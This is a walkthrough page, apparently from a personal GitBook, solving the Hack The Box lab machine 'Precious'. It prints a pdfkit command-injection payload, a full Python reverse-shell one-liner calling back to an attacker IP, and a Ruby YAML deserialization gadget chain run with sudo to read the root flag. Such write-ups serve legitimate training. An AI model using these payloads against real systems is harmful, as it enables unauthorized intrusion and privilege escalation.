Writeups
  • Writeups
  • CTF Writeups
    • ctfs
      • BRCTF
      • CloudSEK - BSides Cyber Security CTF 2023
      • CloudSEK - Nullcon Cyber Security CTF 2023
      • CyberHavoc CTF 2023
      • Cyber Heroines CTF
      • IWCON CTF 2023
      • SecurityBoat - October CTF 2023
      • The Hacker101 CTF
      • Wizer CTF Event 6 Hour Challenge
      • FooBar CTF 2023
      • Lag and Crash 3.0
      • NahamCon CTF 2022
        • Crash Override:
        • Exit Vim:
        • Flagcat:
        • Flaskmetal Alchemist:
        • Personnel:
        • Poller:
        • Prisoner:
        • Quirky:
        • Read The Rules:
        • Technical Support:
        • Wizard:
      • picoCTF
        • crypto
          • Easy Peasy
    • files
  • HTB
    • HTB Challenges
      • Baby Time Capsule
      • Lost Modulus
      • RLotto
      • Toxic | HTB Web Challenge
      • xorxorxor
    • HTB Machines
      • HTB Machine Precious
      • HTB Machine Stocker
  • Other Challenges
    • Academy Box - PEH Capstone TCM Security
    • Saptang Labs Hiring Challenge
Powered by GitBook
On this page

Was this helpful?

  1. HTB
  2. HTB Machines

HTB Machine Precious

PreviousHTB MachinesNextHTB Machine Stocker

Last updated 1 year ago

Was this helpful?

Port scaning with nmap

  • port 80 is open : redirect to http://precious.htb/

add this to /etc/hosts

On this page we have Convert Web Page to PDF functionality

after giving url pdf file is downloaded

using exiftool on pdf we know that it is Generated by pdfkit v0.8.6

This version is vulnerable to RCE

Payload:

http://%20`{command}`

we can use this to get reverse shell

http://%20`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`

references: https://www.revshells.com/

we get shell as user ruby

we can see two user in /home directory

user flag is in directory of user henry but it is not accessible.

inside the directory of user ruby there is config file in .bundle in this file we can see password of user henry

we can use this for ssh to henry

user can run /opt/update_dependencies.rb as root with sudo

this file is not writable. looking at code we see it use YAML.load, which is vulnerable to deserialization attack.

we can write in dependencies.yml

payload:

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: cat /root/root.txt
         method_id: :resolve

reference: https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml

now we can run this with sudo and get the root flag sudo /usr/bin/ruby /opt/update_dependencies.rb

This give root flag.

:octocat: Happy Hacking :octocat: